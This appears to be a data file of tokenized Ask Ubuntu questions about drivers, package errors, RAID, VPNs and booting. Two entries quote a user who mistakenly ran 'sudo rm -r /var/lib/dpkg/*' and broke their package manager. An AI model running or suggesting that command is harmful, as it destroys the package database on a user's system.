344091	ca n't purge x updates ppa because / is treated as a space ?	sudo ppa-purge ppa : ubuntu-x-swat/x-updates i 've tried running that command ... several times . copy/pasted it , manually typed it , tried it in xterm and terminal , to no avail . the output is always : could not find package list for ppa : ubuntu-x-swat x-updates there is no / in that output , which leads me to believe it 's processing the / as a space and trying to find a ppa named exactly that . how can i fix this ?
344100	setting up wireless internet on ubuntu 12.04 - errors with broadcom sta wireless driver	i have recently installed ubuntu 12.04 on the windows partition of my macbook pro model 8.1 . everything seemed to go smoothly during installation however as i am trying to connect to wireless internet , i have had no luck . i have gone to the update manager and installed all of the updates that were ready on my first usage of ubuntu . i have rebooted and there is still no sign of connectivity . i went to add additional drivers and there is one listed - 'broadcom sta wireless driver . ' when i go to activate this driver , i receive an error message that reads 'sorry , installation of this driver failed . please have a look at the log file for details : /var/log/jockey.log . ' after this i have tried removing ubuntu and reinstalling it on my windows partition . this led me to the same place . the internet will connect when i use ethernet . after using lspci -nn -d 14e4 : i receive the following specifications . 02:00.0 ethernet controller [ 0200 ] : broadcom corporation netxtreme bcm57765 gigabit ethernet pcie [ 14e4:16b4 ] ( rev 10 ) 02:00.1 sd host controller [ 0805 ] : broadcom corporation bcm57765/57785 sdxc/mmc card reader [ 14e4:16bc ] ( rev 10 ) 03:00.0 network controller [ 0280 ] : broadcom corporation bcm4331 802.11a/b/g/n [ 14e4:4331 ] ( rev 02 ) i have tried rebuilding the bcmwl-kernel-source using the command sudo apt-get purge bcmwl-kernel-source and then sudo apt-get install bcmwl-kernel-source . yet , nothing . i receive a warning that says warning : no support for locale : en_us.utf8 . i am not sure if this information is pertinent to the overall task . thank you to anyone who might have suggestions . i am very new to ubuntu and still trying to get used to the in 's and out 's of it . thank you !
344101	how to set environment variable for mcr in ubuntu	i am new to ubuntu . i am using matlab in ubuntu . i used 'mcc ' command in matlab ( ubuntu ) to create executable files . now to run those executables i need to set the 'mcr ' directory path to the environment variable . i used 'setenv ' but , it says 'setenv is not found . the following is what i did- setenv path/ < mcr root path > /v7.17 : `` $ path '' and i get the following output- no command 'setenv ' found , did you mean command 'neten' from package 'netenv' setenv : commmand not found can you please help me telling how do i set the environment variable in ubuntu to run my executable files .
344103	how do i use dual monitors with remmina remote desktop client ?	i am trying to use my two monitors when i use remmina remote desktop client . there is no option for using all monitors like rdp in windows . does any one know how can i accomplish that with remmina ? this is the option i 'm talking about in windows rdp :
344104	installing ubuntu 13.04 along windows 8 on acer predator	i 'm trying to install ubuntu 13.04 alongside an existing windows 8 installation . i have shrunk the existing partition where windows is installed in order to make room for ubuntu . i booted ubuntu with the live dvd and it boots without any problem . i then launch the installer , which then probes for existing os installations on the system . the overview i get mentions my partitions , but it does n't detect any installed operating system . so i fear that if i continue to install ubuntu by manually selecting the room where a new partition can be created , my computer will be messed-up . my computer is uefi-enabled so i thought the problem could be there . i disabled secureboot and activated the option to always launch in csm modus ( which makes the system behave like on older bios modus ? ) when looking in gparted , i can also so all my partitions . does anybody have any idea how come the installer does n't detect my windows 8 ? i should mention that there are quite a lot of partitions on the first disk ( i think 4 or 5 ) , maybe that 's a cause of the problem ?
344121	deja-dup failing to restore	i 'm using 13.04 and made a full back up using deja-dup onto and external hard drive . deja-dup always verified the back-ups . when i try to restore through deja-dup i get a message which i have posted about already ( failed back up restore from deja-dup backup ) but i am also getting this message the other 50 % of the time . `` traceback ( most recent call last ) : file '' /usr/bin/duplicity '' , line 1411 , in with_tempdir ( main ) and on it goes for about a page . what am i supposed to do with this information and most importantly how can i successfully restore my backup ?
344122	openstack : one virtual system sum of several hardware resources ?	for example i have a shared hosting server on bare metal which it 's resources going to full . i do n't want to upgrade the hardware to new one be cause i have several unused servers same as this one . also creating new server beside this one is not an option because i have to buy new software license for new servers . right now i have `` unlimited domains license '' . assume i have 5 same servers each one 8 cpu , 32gb ram . is it possible to have a strong virtual system with ~40 cpu , ~160gb and install my license on that ? note : i do n't want clustering by that mean . i just want to install plain windows server or ubuntu server on that strong virtual system and easily extend it .
344125	how to add a grub2 menu entry for booting installed ubuntu on a usb drive ?	i am not asking how to boot the livecd from a usb . i have 2 ubuntu installations , one on my computer 's internal hard drive and another on a usb drive . is there a way to add a grub2 menu entry ( to the grub on my internal hard drive ) to boot the ubuntu os which i have installed to the usb flash drive and have this same menu entry still work after i 've upgraded the linux kernel on the usb installation ?
344126	how to run truecrypt after installation	i have installed truecrypt on ma ubuntu 12.04 machine . i can see the icon of truecrypt when i search on the doc.but on clicking on the icon i am not able to run the software or no responses coming when i try to open the software by clicking the icon.what could be the reason ? or how should i run the same ? note : when i tried to run truecrypt from terminal it shows bash : /usr/bin/truecrypt : can not execute binary file and when i tried sudo truecrypt it shows /usr/bin/truecrypt : 1 : /usr/bin/truecrypt : syntax error : `` ) '' unexpected
344127	unity greeter looking weird	yesterday i looked my notebook to clean the keyboard . needless to say i pressed quite some random buttons . the result was like this : ( except for the blue bar ) . the display 's like it 's selected and buttons do n't show properly . the problem is similar to xubuntu lightdm unity-greeter bad looking theme , but the cause is different and the solution mentioned there does not work . can anyone help me out ?
344132	software centre errors	trying to download software from the ubuntu software centre the 'install ' button for most of the software is missing and i get the following messages for various programs . when trying to get clamtk i get this message : `` available from the universe source . '' when clicking on the 'more info ' button of gimp in the software centre i get this message . `` there isn’t a software package called “gimp” in your current software sources . '' i have gone to system settings and opened software and updates under the tab 'ubuntu software ' all the boxes are ticked . in the 'other software ' tab the first box is n't ticked ( cdrom with ubuntu 12.10 ... ) but all other boxes are ticked . can someone please explain what is causing this and how i can go about fixing it ? i reinstalled 12.10 . i then upgraded via the cli to 13.04 . i have reinstalled and upgraded from 12.10 to 13.04 many times and never come across this . thanks in advance .
344136	ubuntu 12.04 does not shutdown	i am using ubuntu 12.04 amd64 desktop . it worked fine , but after the last update , the system does not shutdown . it gets stuck with the last line on the screen being : unmounted /kernel/debug i have to use ctrl+alt+del . it restarts the machine . then at the grub screen , i choose to hard shutdown the machine . can anybody help me with this ?
344137	can i deploy juju on eucalyptus ?	please let me know if i can deploy juju on eucalyptus , if yes please provide me the configuration details which i need to edit on environments.yaml file .
344139	download server iran	i have ubuntu 13.04 and my problem is this : when i installed it i chose my location to be iran and ubuntu found a download server in iran for me . but a few days ago i changed my download server to one in us . now i want to set it back to iran . but i can not find it . and when i choose ubuntu to find the best server it finds one in england , sweden , ... i have problem with downloading from these servers . pleast help .
344160	why ca n't i type in my search bar of my ubuntu app ?	i am following a youtube tutorial ( here : creating your first ubuntu app ) for creating my own ubuntu app . however , when i get to the part where i add a text bar , i save to then run and try to type in text , but nothing happens . please tell me there is an easy solution to this .
344161	change ubuntu on ubuntu base distro without loose any config	is this possible ? do fresh install ubuntu based or ubuntu itself and copy from old machine all configuration . not only user conf ( that 's easy ) , but also , all system configuration include ssh keys for remote servers ( really annoing config that each time ) , db from mysql and etc.. like system was only updated not , fresh installed .
344162	why ca n't i set up alias for shutdown ?	i have edited my .bash_aliases to contain the following line alias shutdown='sudo shutdown -h now' but when i try to run the alias it gives this error message shutdown : illegal time value try `shutdown -- help ' for more information . it seems like all my aliases containing the shutdown-command is giving this error message . any ideas ?
344168	`` unexpected error interacting with provider : 403 forbidden '' error when trying to bootstrap	in the maas portal : ht tp : //192.168.101.148/maas , i can see 6 nodes , and the status are all : ready . and my environments.yaml file is : environments : maas : type : maas maas-server : ht tp : //192.168.101.148:80/maas maas-oauth : `` the key i get from the portal '' admin-secret : super-secret-made-up-admin-key default-series : precise and the error is below : root @ ubuntu : ~ # juju bootstrap 2013-09-11 15:55:31,557 info bootstrapping environment 'maas ' ( origin : distro type : maas ) ... 2013-09-11 15:55:32,222 error failed to launch machine /maas/api/1.0/nodes/node-e097fab8-1a11-11e3-a94b-0800270f346d/ ; attempting to release . traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/juju/providers/maas/launch.py '' , line 48 , in start_machine instance_uri , cloud_init.render ( ) ) providerinteractionerror : unexpected error interacting with provider : 403 forbidden unexpected error interacting with provider : 403 forbidden 2013-09-11 15:55:32,404 error unexpected error interacting with provider : 403 forbidden
344171	guide to set-up dns and multiple domain on ubuntu 12.04	i would like to know , how to set-up a dns server and to run multiple websites on a single vps server . i already have a vps server and i 've installed webmin for my ease.. i 'm still confused how to set it up . if i can set up both of them , i know how to change the ns record in the domain registrar . so , please advise me how to do or may be a clear guide to do . thanks in advance .
344176	do i need a firewall for my desktop ?	i do n't have a router , but i mostly use my desktop for online shopping and torrenting . so , do i have to enable the firewall ? i hope not , because i 'm really dumb and i do n't think i will be able to configure the firewall .
344178	ubuntu 13.04/13.10 on sony vaio fit 15 svf15a1c5e	i am planning on buying this laptop : sony vaio fit 15 ( svf15a1c5e ) with very high-end specs : intel速 coretm i7-3537u , 2 ghz , 39.5cm led 1920 x 1080 +webcam , nvidia速 geforce速 gt 735m 2 gb , 512 gb sata flash ssd , 12 gb 1600 mt/s ddr3l-sdram i wanted to know if anybody has installed ubuntu 13.04 ( or future 13.10 ) on this model . i 've read in another post that there might be a minor sound issue which is fixable with an update . but other than that , will i be able to just wipe out windows , and put a clean ubuntu install without any issues ? thanks .
344180	triple boot windows 7 , ubuntu , and elementary os luna	i want to try elementary os using a real installation ( not via a vm ) . i currently have a dual boot set-up already with windows 7 and ubuntu 12.04 . is it possible to do so ? if so , please help me with some guidelines . thank you .
344182	how can i effectively build soft raid on startup and before mounting filesystems ?	i recently made a soft raid . however , i faced the situation when i have raid without uuid , because i used -- build command instead of usual -- create , by the reason that correct mdadm arrays are not readable under windows . this makes me big problem , because mdadm config supports only arrays described by uuids . moreover , directory /dev/disk/by-uuid does not contain links to my raid drives and i have to access them through /dev/disk/by-id , because their drive names change on each system startup : sdh becomes sdf , sdi becomes sdg and vice-versa . now i have to execute this after every startup : sudo mdadm -- build -- chunk=64k /dev/md1 -- level=0 -- raid-devices=2 /dev/disk/by-id/scsi-sata_hitachi_hds7220_jk11a8b9j8x1hf /dev/disk/by-id/scsi-sata_hitachi_hds7230_mn1221f30976bd sudo mount /dev/md1p2 /media/extframe i 'd like to run this command automatically on boot and before mount -a executes . how can i achieve this ? it seems to me that putting those lines in /etc/rc.local not the right choice , because it starts but does n't mount . the sudo mdadm -- detail -- scan command gives : array /dev/md1 metadata= also /usr/share/mdadm/mkconf gives such output : # mdadm.conf # # please refer to mdadm.conf ( 5 ) for information about this file . # # by default ( built-in ) , scan all partitions ( /proc/partitions ) and all # containers for md superblocks . alternatively , specify devices to scan , using # wildcards if desired . # device partitions containers # auto-create devices with debian standard permissions create owner=root group=disk mode=0660 auto=yes # automatically tag new arrays as belonging to the local system homehost # instruct the monitoring daemon where to send mail alerts mailaddr hopungo @ gmail.com # definitions of existing md arrays the blkid /dev/md1 also gives no output and mdadm -- examine /dev/sdf gives : mdadm : array line /dev/md1 has no identity information . /dev/sdf : mbr magic : aa55 partition [ 0 ] : 4294967295 sectors at 1 ( type ee ) i have figured it out . sudo apt-get install dmraid sudo dmraid -ay -z this will activate all available arrays . -z option will remove underlying devices to not to destroy data accidentally . arrays will be available at the boot moment allowing you to boot from them . on another system i have such array ( on via chip ) and i successfully booted into windows 8 from grub . however , on the main system problem did not disappear . here is the output of sudo dmraid -ay -z : hopungo @ hopungo-pc : ~ $ sudo dmraid -ay [ sudo ] password for hopungo : error : ddf1 : seeking device `` /dev/dm-3 '' to 18446744073709421056 error : hpt37x : seeking device `` /dev/dm-3 '' to 4608 error : hpt45x : seeking device `` /dev/dm-3 '' to 18446744073709547008 error : isw : seeking device `` /dev/dm-3 '' to 18446744073708469760 error : sil : seeking device `` /dev/dm-3 '' to 18446744073709289984 raid set `` pdc_baijcbgej '' already active raid set `` pdc_baijcbgej1 '' already active raid set `` pdc_baijcbgej2 '' already active raid set `` pdc_baijcbgej5 '' already active raid set `` pdc_baijcbgej6 '' already active
344183	partitioning ssd for flashcache	i am trying to setup my hdd + ssd on my win7/ubuntu dual booting laptop to work with flashcache . part of my ssd ( /dev/sdb1 ) is already partitioned for expresscache on windows 7 . for ubuntu , i am following the directions here . however , i do not know which filesystem to use for the cache device and none of the guides specify it . should i use ext4 like i use on my system or should it be hfs+ as it is how expresscache does it for windows 7 ?
344186	keyboard @ sign missing	i can not type the @ sign using shift+2 . i get `` instead . i have tried all sorts of language selection . why do none of the english selection work . setting up email is impossible with no @ sign !
344187	ubuntu live cd - starting load graphics devices [ fail ]	i know i 'm running old kit but ubuntu used to be happy with that . here 's the problem . amd 64 single core processor . onboard graphics . 756mb of ram . used to be fine with ubuntu 8.04 . updated 'live ' ( no cd ) to 10.04 ( via the package manager ) . need to install from cd now and newer 12.10 cd wo n't be a good boy and load . i get the following error message . i have swapped out the data cable , dvd drive , and have now put in a second mobo ( same spec as listed above ) . an old spec that used to work fine now does n't . is this a driver issue ? i 'm thinking it is as the older live cd 's worked and these newer ones do n't . any help would be much appreciated .
344194	ssh functionality of ubuntu	in ubuntu , when i try to connect to an ssh server from the terminal , a dialog window pops up asking me to enter my ssh password . when i enter it , my password is remembered for the duration of that terminal session . what settings / packages must be installed to achieve this functionality ? i 'd like to get something similar working in a straight debian install , so that i do n't have to manually enter ssh-add everytime . thanks .
344195	dual display was working , now i have an 'unknown ' monitor even when it is unplugged	this is my first question on here so open to any feedback on format.. i had a perfect dual display set-up working on ubuntu 12.04 . then one day , i ran an update and now my external monitor does n't work at all . i say it does n't work at all , if i connect it , i can move my mouse on to the external monitor but the external monitor stays black . my display settings recognise it perfectly but it just stays black . now , when i unplug the external monitor my display settings show an 'unknown ' monitor that will not go away and i think it may be the main reason behind this issue ? image - http : //img560.imageshack.us/img560/3332/ztmy.png i 've hunted around for a solution and can not find one so this is really my last resort . here 's some information that may help : lspci : 01:05.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] rs880m [ mobility radeon hd 4225/4250 ] xrandr ( with monitor unplugged ) : screen 0 : minimum 320 x 200 , current 1366 x 768 , maximum 8192 x 8192 vga-0 connected ( normal left inverted right x axis y axis ) 1024x768 60.0 800x600 60.3 56.2 848x480 60.0 640x480 59.9 lvds connected 1366x768+0+0 ( normal left inverted right x axis y axis ) 344mm x 194mm 1366x768 59.6*+ 1280x720 59.9 1152x768 59.8 1024x768 59.9 800x600 59.9 848x480 59.7 720x480 59.7 640x480 59.4 hdmi-0 disconnected ( normal left inverted right x axis y axis ) xrandr ( with monitor connected ) : screen 0 : minimum 320 x 200 , current 1366 x 768 , maximum 8192 x 8192 vga-0 connected 1366x768+0+0 ( normal left inverted right x axis y axis ) 410mm x 230mm 1366x768 59.8*+ 1280x720 60.0 1024x768 75.1 75.0 60.0 832x624 74.6 800x600 75.0 60.3 56.2 640x480 75.0 60.0 720x400 70.1 lvds connected 1366x768+0+0 ( normal left inverted right x axis y axis ) 344mm x 194mm 1366x768 59.6*+ 1280x720 59.9 1152x768 59.8 1024x768 59.9 800x600 59.9 848x480 59.7 720x480 59.7 640x480 59.4 hdmi-0 disconnected ( normal left inverted right x axis y axis ) i will be grateful for any help , i 've been pulling my hair out over this for weeks . also to note , it 's not the actual monitor as it works on my friends ubuntu 12.04 installation so must be my set up ! my ideal solution would be for my monitor to work again ! if that fails , then at least for this 'unknown ' monitor to be gone . thanks
344197	13.04 on chromebook series 3 arm wont boot !	i have installad 13.04 on my chromebook ( snow premier g ) . all went well , but after reboot it does not boot into ubuntu . i get a black screen with a cursus blinking . where do i go from here ? ? please help !
344200	how to fix lock error with at command ?	when i execute this : at 7:43 -f atfile.sh i get this : warning : commands will be executed using /bin/sh can not open lockfile /var/spool/cron/atjobs/.seq : no such file or directory so what i 'm doing wrong ? what 's wrong with the command ? how do i fix this error ?
344204	limited or no connectivity on windows clients	here 's my scenario using ubuntu server non gui , i would set up a server with static ip on eth0 then share the connection on eth1 - > connected to a network switch . i did set up eth0 as static , installed isc-dhcp-server , set up ip and range , set eth1 as default interface for dhcp server , started dhcp server , connected the client pc to the switch , but cant access the internet do i still have to set up eth1 ip on /etc/network/interfaces ? thank you
344205	adding icons to top pannel in 12.04	i just installed ubuntu 12.04 . i want to add application icons on top pannel but as you people mentioned the super+alt+right click is not working for me . 'add to panel ' window is not getting opened . please help me out .
344208	new to linux and starting with ubuntu 13.04	guys i am new to linux and wanted to know the details of working of linux from the very basics i have started using the basic terminal commands but still i want to know them better and how it works can somebody suggest some reference i can use , some book or material that can provide me some insight to linux .
344210	dpkg exit with error `` can not scan updates directory `/var/lib/dpkg/updates/ ' : no such file or directory '' , how to fix it ?	earlier , i had a problem with a package , and i ( wrongly ) ran this : rm -r /var/lib/dpkg/* see also my other question . now when i try to upgrade , i get this : e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? masoud @ masoud-pc : ~ $ sudo apt-get upgrade e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? and when i use : sudo dpkg -- configure -a i get this : dpkg : error : can not scan updates directory `/var/lib/dpkg/updates/ ' : no such file or directory and for sudo apt-get upgrade -f get : reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... failed . the following packages have unmet dependencies : ia32-libs : depends : ia32-libs-multiarch but it is not installable wine1.4 : depends : wine1.4-i386 ( = 1.4.1-0ubuntu5 ) but it is not installable e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages . e : unable to correct dependencies
344211	failover clustering with apache2 on linux ( ubuntu ) and file synchonization	i am interested in creating a failover cluster on ubuntu ( 12.04.3 lts ) using apache2 . i am currently using ucarp . q1 : i followed instructions on this first link but i have a problem in file synrchonization . this second link from the same website describes the procedure . in the first link , the address 192.168.1.202 that is using is a virtual ip or do i put my own ip there ? if i put my own ip ( and subnet ) i canot get it to work . i get failed to bring up eth0 . during networking restart and in ifconfig i can not get the `` eth0 : ucarp '' virtual address , only the `` eth0 '' and `` lo '' if i put 192.168.1.202 i think that i am wrong because that is not my real ip ( is that right ) . can anyone help me out here ? q2 : do you know another easy way to create a cluster with apache2 on ubuntu and virtualize the failover cluster mechanism ? thanks in advance .
344216	glxspheres not found . how to install ?	i installed kubuntu 13.10 beta 1 yesterday . today , i installed bumblebee and i was tried to check my fps on video card . when i ran glxspheres an error command not found appeared . how can i install glxspheres ? i tried sudo apt-get install virtualgl but the package was not found .
344224	can anyone help with a package manager problem ?	i have the following permanent error message and am unable to open package manager or upgrade : e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists/gb.archive.ubuntu.com_ubuntu_dists_precise-backports_main_binary-amd64_packages , e : the package lists or status file could not be parsed or opened . i 'm a complete novice . any help appreciated . thanks , em
344226	set difference of packages installed on 2 machines	given two machines : servera serverb which tool best outputs a `` set '' , diff-like view of packages installed : only on servera only on serverb on both machines
344229	changing window background color by theming	i am a bit confused about this in theme tutorials , but how would i go about changing the color of windows in unity . i mean the file , edit , etc . bars to a different color and other colors related to windows . other colors , such as window backgrounds , i 've managed to do , but no matter what i change , . any help is appreciated . using ubuntu 12.04 .
344239	empathy `` facebook account requires authorization '' problem	i am trying to connect to my facebook account from empathy on ubuntu 13.04 . when setting up the account in empathy everything looks ok , but then empathy just shows the message : facebook account requires authorization according to bug # 1170832 , this is due to a problem in the telepathy-gabble package which has been fixed in version 0.18.1 . however , i manually installed telepathy-gabble_0.18.1-1_amd64.deb from launchpad and the problem persists . has anyone else had any luck with this ?
344240	unable to download from svn repository	i simply want to know what are the steps to download something from an svn repository ? i have browsed for it and it appears to be a simple one-step process using the command : svn co https : //svn.ntop.org/svn/ntop/trunk/ndpi i have installed the svn using apt-get install subversion , and have configured proxy settings for https . however , when i enter this command , there is no response , no error message , nothing . the terminal becomes irresponsive . even crtl+c does not work to quit the command . what should i do ? thank you ?
344245	ca n't connect to pptp vpn , even though it used to work and i did n't change anything	i am pretty new to ubuntu and linux , so forgive me if this is obvious . i set up a pptp vpn connection the other day . it worked perfectly fine , but one day to the other , it did n't anymore . i used it on 12.04 , and it stopped working there . i then upgraded to 13.04 and it still wont work . the only thing i changed was adding a second monitor ( i 'm now running dual monitors ) , but i doubt that that has anything to do with it . i also installed the recommended updates . the syslog gave me this : sep 11 13:59:18 veith-ubuntu networkmanager [ 885 ] : < info > starting vpn service 'pptp ' ... sep 11 13:59:18 veith-ubuntu networkmanager [ 885 ] : < info > vpn service 'pptp ' started ( org.freedesktop.networkmanager.pptp ) , pid 4958 sep 11 13:59:18 veith-ubuntu networkmanager [ 885 ] : < info > vpn service 'pptp ' appeared ; activating connections sep 11 13:59:18 veith-ubuntu networkmanager [ 885 ] : < info > vpn plugin state changed : init ( 1 ) sep 11 13:59:18 veith-ubuntu networkmanager [ 885 ] : < info > vpn plugin state changed : starting ( 3 ) sep 11 13:59:18 veith-ubuntu networkmanager [ 885 ] : < info > vpn connection 'us vpn ' ( connect ) reply received . sep 11 13:59:18 veith-ubuntu pppd [ 4962 ] : plugin /usr/lib/pppd/2.4.5/nm-pptp-pppd-plugin.so loaded . sep 11 13:59:18 veith-ubuntu pppd [ 4962 ] : pppd 2.4.5 started by root , uid 0 sep 11 13:59:18 veith-ubuntu pppd [ 4962 ] : using interface ppp0 sep 11 13:59:18 veith-ubuntu pppd [ 4962 ] : connect : ppp0 < -- > /dev/pts/1 sep 11 13:59:18 veith-ubuntu pptp [ 4965 ] : nm-pptp-service-4958 log [ main : pptp.c:314 ] : the synchronous pptp option is not activated sep 11 13:59:18 veith-ubuntu networkmanager [ 885 ] : scplugin-ifupdown : devices added ( path : /sys/devices/virtual/net/ppp0 , iface : ppp0 ) sep 11 13:59:18 veith-ubuntu networkmanager [ 885 ] : scplugin-ifupdown : device added ( path : /sys/devices/virtual/net/ppp0 , iface : ppp0 ) : no ifupdown configuration found . sep 11 13:59:18 veith-ubuntu networkmanager [ 885 ] : < warn > /sys/devices/virtual/net/ppp0 : could n't determine device driver ; ignoring ... sep 11 13:59:18 veith-ubuntu pptp [ 4966 ] : nm-pptp-service-4958 warn [ open_inetsock : pptp_callmgr.c:329 ] : connect : connection refused sep 11 13:59:18 veith-ubuntu pptp [ 4966 ] : nm-pptp-service-4958 fatal [ callmgr_main : pptp_callmgr.c:127 ] : could not open control connection to 67.212.175.124 sep 11 13:59:18 veith-ubuntu pptp [ 4965 ] : nm-pptp-service-4958 fatal [ open_callmgr : pptp.c:487 ] : call manager exited with error 256 sep 11 13:59:18 veith-ubuntu pppd [ 4962 ] : modem hangup sep 11 13:59:18 veith-ubuntu pppd [ 4962 ] : connection terminated . sep 11 13:59:18 veith-ubuntu avahi-daemon [ 865 ] : withdrawing workstation service for ppp0 . sep 11 13:59:18 veith-ubuntu networkmanager [ 885 ] : scplugin-ifupdown : devices removed ( path : /sys/devices/virtual/net/ppp0 , iface : ppp0 ) sep 11 13:59:18 veith-ubuntu networkmanager [ 885 ] : < warn > vpn plugin failed : 1 sep 11 13:59:18 veith-ubuntu pppd [ 4962 ] : exit . sep 11 13:59:18 veith-ubuntu networkmanager [ 885 ] : < warn > vpn plugin failed : 1 sep 11 13:59:18 veith-ubuntu networkmanager [ 885 ] : < warn > vpn plugin failed : 1 sep 11 13:59:18 veith-ubuntu networkmanager [ 885 ] : < info > vpn plugin state changed : stopped ( 6 ) sep 11 13:59:18 veith-ubuntu networkmanager [ 885 ] : < info > vpn plugin state change reason : 0 sep 11 13:59:18 veith-ubuntu networkmanager [ 885 ] : < info > policy set 'kabelnetzwerkverbindung 1 ' ( eth0 ) as default for ipv4 routing and dns . sep 11 13:59:18 veith-ubuntu networkmanager [ 885 ] : < warn > error disconnecting vpn : could not process the request because no vpn connection was active . sep 11 13:59:23 veith-ubuntu networkmanager [ 885 ] : < info > vpn service 'pptp ' disappeared i googled a bit and uninstalled pptp-linux and network-manager-pptp . then i reinstalled them . i still ca n't connect and i get the same code . i definitely configuered everything right in the network manager , otherwise it would n't have worked in the first place . i mppe activated , and checked all the settings 100 times . another strange thing : when i tried it yesterday , it would give me the message that it connected for about half a second , only to be replaced by the `` ca n't connect '' message right after . it does n't do that today though . i also tried forbidding all the compression types . i searched , but could n't find anything ( at least nothing i understood ) . any help is greatly appreachiated ! greetings
344246	flickering problem when opening website and window	i 'm new to linux . i recently installed ubuntu 13.04 in my lapatop . whenever i open any window or website there comes flickering . i think the problem is with the graphics card . i have amd radeon hd 6630 grpahics card . i tried going through additional driver that says the driver is active but not in use . in order to install graphics card of my own what shall i do ?
344255	problem with qjackctl	i am struggling with qjackctl . one of the things that was suggested on a youtube video was to create a nano file and put in this code : @ audio - rtprio -99 @ audio - memlock -unlimited @ audio - nice -19 however in my experimenting i have created more than one audio file and i believe that they are fighting each other . ideally i would like to remove some of the files , but if i ca n't do this i would like to just make one of them blank . how do i do this ? thank you all in advance for your help .
344257	upgrade from 12.04 to 13.10 : computer wo n't boot	i upgraded from 12.04 to 13.10 and my computer boots to a black screen . i hear the drumroll , but there is no functionality after that . i 've downloaded a livecd of 12.04 on my other computer , and i changed the bios settings to boot from cd/dvd first , but it still does the same thing . i booted advanced options , edited [ ro quick splash ] to [ ro nomodeset ] and it started normally . i rebooted the system and it was back to the same junk . what do i need to do while it is operating to make it reliable with every restart ? this seems to be a systemic issues with numerous ubuntu upgrades , but i have n't read a solution yet . i need some help , please ! thanks .
344260	dpkg remove and do n't work	i tried to upgrade ubuntu and some package broke , so i wrongly did this : sudo rm -r /var/lib/dpkg/* and now i get this : $ sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : ia32-libs : depends : ia32-libs-multiarch but it is not installable wine1.4 : depends : wine1.4-i386 ( = 1.4.1-0ubuntu5 ) but it is not installable e : unmet dependencies . try using -f. and $ sudo dpkg -- configure -a dpkg : error : unable to create new file '/var/lib/dpkg/info/format-new ' : no such file or directory and $ sudo apt-get upgrade -f reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... failed . the following packages have unmet dependencies : ia32-libs : depends : ia32-libs-multiarch but it is not installable wine1.4 : depends : wine1.4-i386 ( = 1.4.1-0ubuntu5 ) but it is not installable e : error , pkgproblemresolver : :resolve generated breaks , this may be caused by held packages . e : unable to correct dependencies
344268	does ubuntu deliberately contaminate its binaries to help nsa ?	a week ago asking this question of microsoft or such would have got me labelled as paranoid , and asking this question about ubuntu would have seemed plain stupid , bordering offensive . then we found out that there 's been a `` $ 250m-a-year us program works covertly with tech companies to insert weaknesses into products '' . this is ( evil ) genius : if you insert secret weaknesses into software or services , e.g . ssl key generation , then your job of breaking in to steal data is made a lot easier . in deed , this is why those agencies can now apparently decrypt a fair bit of ssl traffic on the fly . i felt smug , thinking open source saves the day : hard to introduce code that does something daft when everyone 's looking ( much much easier in closed source world ) . although this can still happen , e.g . debian 's massive ssh key fail of 2008 . back then , people at slashdot were asking who introduced the change that nobody noticed and which left the os wide open . it seems that with a $ 250m budget you 've got various options to pay someone to try to sneak in vulnerabilities unnoticed , either out in the open or , as in the debian case , more internal . this $ 250m has been used to bribe companies . so what of canonical ? i love ubuntu and have always trusted it , but knowing they 're ( a ) a company and ( b ) short of cash , made me think : actually they 're in quite a good position to do such evil bidding . i mean sending all your local searches off to amazon seems nothing compared to what they could do , after all , as shuttleworth says we have root ! the german government recently spotted that they ca n't trust windows 8 machines , will they move to ubuntu ? ( they 're rather partial to debian anyway . ) i posed the question in a provocative manor , but i believe it 's valid ; i 'm not seeking opinion , nor rants , but wanted to see if anyone could answer categorically no ( and back that up with evidence ) .
344271	assigning gnome overview mode to custom keyboard shortcut	how can i assign gnome 's overview mode to a custom shortcut ? what would be the command that i need to call with my keyboard shortcut ?
344275	how to install canon lbp 2900b printer in ubuntu 13.04 ? [ on hol	i have check the list of printer available in the ubuntu os canon printer list but the canon 2900b is not available . he is also ask for the ppd file for the printer i have put the printer cd in rom and try to locate the file but unable to find it . please help me to install the canon lbp 2900b printer in ubuntu os 13.04 .
344282	which partition is windows ?	i tried to install ubuntu 13.04 beside windows 7 . at the point where it gave me the option to increase or decrease partition space , i could n't figure out which side was the windows partition and which was the ubuntu partition . can you help ? left or right is windows ? i have 350 gb of disk space and only want to allocate 40 gb to ubuntu . however , i do n't want to make a mistake and allocate the 40gb to windows instead .
344293	ca n't find plasmawallpaperviewer	i recently get into this : plasma wallpaper tutorial my problem is : plasmawallpaperviewer -p tutorial when i try to do this , the konsole says : the program 'plasmawallpaperviewer ' is currently not installed . you can install it by typing : sudo apt-get install kde-workspace-bin so i tried : sudo apt-get install kde-workspace-bin and it says : reading package lists ... done building dependency tree reading state information ... done kde-workspace-bin is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 201 not upgraded . i have kde-workspace-bin , but not plasmawallpaperviewer , what can i do ?
344294	absence of installing ubuntu alongside windows during new installation	i am using a company 's laptop which has a single partition . only 900 mb is achieved after shrinking using disk management tool in windows . i tried to install both 13.04 and 12.04.3 versions . but none of them showed the traditional option of installing ubuntu alongside windows . the reason i ca n't mess with company 's laptop and i am dying without ubuntu . i hope that somebody can help me resolve this problem .
344296	will ubuntu work with reproducible builds ?	in a comment on the question does ubuntu deliberately contaminate its binaries to help nsa ? , jorge castro notes that debian is thinking about working with reproducible builds . they state why do we want reproducible builds ? independent verifications that a binary matches what the source intended to produce . help multi-arch : same packages co-installation ( as they need every matching file to be byte identical ) . be able to generate debug symbols for packages which do not have a âdebug packageâ . is there any indication that ubuntu plans on implementing reproducible builds as well ?
